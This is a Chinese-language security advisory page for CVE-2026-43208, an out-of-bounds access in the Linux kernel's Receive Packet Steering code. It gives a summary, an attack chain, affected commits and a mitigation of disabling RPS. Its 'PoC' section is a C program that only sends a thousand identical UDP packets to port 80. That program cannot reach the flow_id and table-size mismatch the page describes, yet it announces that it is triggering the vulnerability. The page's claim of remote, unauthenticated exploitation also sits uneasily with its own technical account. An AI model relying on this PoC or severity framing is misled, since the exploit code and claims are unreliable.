CVE-2026-43208 CVSS 9.8 严重

CVE-2026-43208 Linux内核RPS越界访问漏洞

披露日期: 2026-05-06

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43208

漏洞类型

越界访问

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核网络子系统的RPS（Receive Packet Steering）机制存在越界访问漏洞。由于set_rps_cpu()函数错误地假设所有接收队列的RPS表大小一致且不变，直接复用get_rps_cpu()计算的flow_id，导致在特定条件下访问越界内存，引发系统崩溃或潜在的安全风险。

技术细节

该漏洞源于Linux内核网络驱动中RPS实现的逻辑缺陷。get_rps_cpu()根据当前队列的RPS表大小计算flow_id，但set_rps_cpu()被调用时，可能面临RPS表大小不一致的场景（例如表大小动态调整或在不同队列间传递）。直接传递flow_id导致索引值超出新表边界，触发Out-of-Bounds Read/Write。攻击者无需交互即可通过网络触发该路径，导致内核恐慌或潜在的任意代码执行。

攻击链分析

STEP 1

步骤1：侦察

攻击者识别目标系统运行受影响版本的Linux内核，并确认网络接口配置启用了RPS（Receive Packet Steering）。

STEP 2

步骤2：触发漏洞

攻击者向目标发送特制的网络数据包流，旨在触发内核网络子系统的数据包处理逻辑，特别是RPS CPU选择流程。

STEP 3

步骤3：越界访问

内核在处理过程中，set_rps_cpu()函数错误地使用了来自get_rps_cpu()的flow_id值，而该值对于当前RPS表来说可能过大。

STEP 4

步骤4：系统崩溃

越界访问导致内核读取或写入无效内存地址，触发内核恐慌（Kernel Panic）导致系统崩溃，或潜在的代码执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * Conceptual PoC for CVE-2026-43208
 * This code attempts to trigger network traffic that exercises the RPS path.
 * Successful exploitation requires a vulnerable kernel version and RPS enabled.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

void send_trigger_packets(const char *ip) {
    int sockfd;
    struct sockaddr_in servaddr;
    char buffer[1024] = "Trigger Data";

    // Create UDP socket
    sockfd = socket(AF_INET, SOCK_DGRAM, 0);
    if (sockfd < 0) {
        perror("Socket creation failed");
        exit(EXIT_FAILURE);
    }

    memset(&servaddr, 0, sizeof(servaddr));
    servaddr.sin_family = AF_INET;
    servaddr.sin_port = htons(80); // Target port
    inet_pton(AF_INET, ip, &servaddr.sin_addr);

    // Send multiple packets to stress RPS logic
    for(int i = 0; i < 1000; i++) {
        sendto(sockfd, buffer, sizeof(buffer), 0, (const struct sockaddr *)&servaddr, sizeof(servaddr));
    }

    printf("[+] Packets sent to target %s to trigger RPS flow_id issue.\n", ip);
    close(sockfd);
}

int main(int argc, char *argv[]) {
    if (argc < 2) {
        printf("Usage: %s <target_ip>\n", argv[0]);
        return 1;
    }
    
    printf("[*] Attempting to trigger CVE-2026-43208...");
    send_trigger_packets(argv[1]);
    
    return 0;
}

影响范围

Linux Kernel < commit 5455a232edea6b946b99449f15ca771a8874a5a6

Linux Kernel < commit 8a8a9fac9efa6423fd74938b940cb7d731780718

Linux Kernel < commit ed712dc0d64dee5f0d05e4d8ca57711f8a9c850c

防御指南

临时缓解措施

如果无法立即升级内核，建议禁用RPS（Receive Packet Steering）功能作为临时缓解措施。可以通过修改sysfs文件系统中的rps_cpus相关配置，将对应网卡队列的RPS掩码设置为0来实现。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表